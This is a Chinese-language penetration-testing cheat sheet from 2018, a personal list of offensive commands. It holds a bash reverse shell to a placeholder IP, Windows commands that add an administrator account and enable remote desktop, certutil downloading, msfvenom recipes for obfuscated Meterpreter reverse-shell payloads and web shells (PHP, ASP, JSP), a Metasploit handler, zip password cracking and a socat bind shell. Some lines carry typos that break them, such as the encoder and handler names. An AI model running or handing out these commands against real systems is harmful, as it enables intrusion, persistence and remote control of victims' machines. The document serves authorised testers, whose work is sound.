渗透测试中常用命令和技巧备忘录 2018-06-30 11:18:36 Steven Xeldax > 收集自己常用的命令来给自己速查。 ## linux常用命令 * 查找IP地址 ``` grep '\([0-9]\{1,3\}.\)\{3\}[0-9]\{1,3\}' file.txt ``` * 最原始的反弹shell ``` /bin/bash -i >& /dev/tcp/xxx.xxx.xxx.xxx/12345 0>&1 & ``` * python的交互式shell ``` python -c "import pty;pty.spawn('/bin/bash')" ``` * iptables 透明代理 ``` iptables -t nat -A PREROUTING -i wlp4s0 -p tcp -j REDIRECT --to-port 8080 ``` ## windows常用命令 * 添加一个用户/修改用户密码 ``` net user USERNAME PASSWORD /add ``` * 添加用户到管理员组 ``` net localgroup administrators USERNAME /add ``` * 查看管理员用户 ``` net localgroup administrators ``` * 添加用户到远程桌面组 ``` net localgroup "Remote Desktop Users" USERNAME /add ``` * 下载文件 ``` certutil.exe -urlcache -split -f %1 ``` * 获取运行的进程和服务msinfo ``` start /wait msinfo32.exe /report list.txt /categories swenv+SWEnvStartupTasks ``` * 获取环境变量 ``` start /wait msinfo32.exe /report startup.txt /categories swenv+SWEnvEnvVars ``` * 获取自启动程序相关信息 ``` start /wait msinfo32.exe /report programs.txt /categories swenv+SWEnvStartupPrograms ``` * 开启3389端口 在windows server 2003中,可以使用cmd命令开启3389 ``` wmic path win32_terminalservicesetting where (__CLASS !="") call setallowtsconnections 1 ``` 在windows server 2008/7/server 2012中 ``` wmic /namespace:\\root\cimv2\terminalservices path win32_terminalservicesetting where (__CLASS != "") call setallowtsconnections 1 ``` ``` wmic /namespace:\\root\cimv2\terminalservices path win32_tsgeneralsetting where (TerminalName='RDP-Tcp') call setuserauthenticationrequired 1 ``` ``` reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fSingleSessionPerUser /t REG_DWORD /d 0 /f ``` ## metaspoit常用命令 * windows payload >msfvenom -p windows/meterpreter/reverse_tcp LHOST=x.x.x.x LPORT=xxxx -f exe -o /root/virus.exe -e x86/shikata_fa_nai -i 8 * linux payload >msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=x.x.x.x LPORT=xxxx -f elf -o /root/shell.elf #### Web Shell * php payload >msfvenom -p php/meterpreter/reverse_tcp LHOST=x.x.x.x LPORT=xxxx -f raw -o /root/shell.php * asp payload >msfvenom -p windows/meterpreter/reverse_tcp LHOST=x.x.x.x LPORT=xxxx -f asp -o a.asp * jsp payload >msfvenom -p java/jsp_shell_reverse_tcp LHOST=x.x.x.x LPORT=xxxx -f raw -o shell.jsp #### Script Shell * python payload >msfvenom -p cmd/unix/reverse_python LHOST=x.x.x.x LPORT=xxxx -f raw -o shell.py * bash payload >msfvenom -p cmd/unix/reverse_bash LHOST=x.x.x.x LPORT=xxxx -f raw -o shell.sh #### metasploits ``` use exploits/multi/Handle set PAYLOAD <payloadname> set LHOST <host> set LPORT <port> set ExitOnSession false exploit -j -z ``` ## mysql常用操作语句 * 修改用户密码 ``` mysql> use mysql; mysql> update user set password=password('123') where user='root' and host='localhost'; mysql> flush privileges; ``` * 创建用户和授权 ``` CREATE USER 'username'@'host' IDENTIFIED BY 'password'; GRANT privileges ON databasename.tablename TO 'username'@'host' ``` * 删除用户 ``` DROP USER 'username'@'host'; ``` ## Another zip爆破 ``` fcrackzip -b -u -l 1-5 00000014.zip ``` socat ``` socat tcp-listen:23 exec:cmd,pty,stderr ```
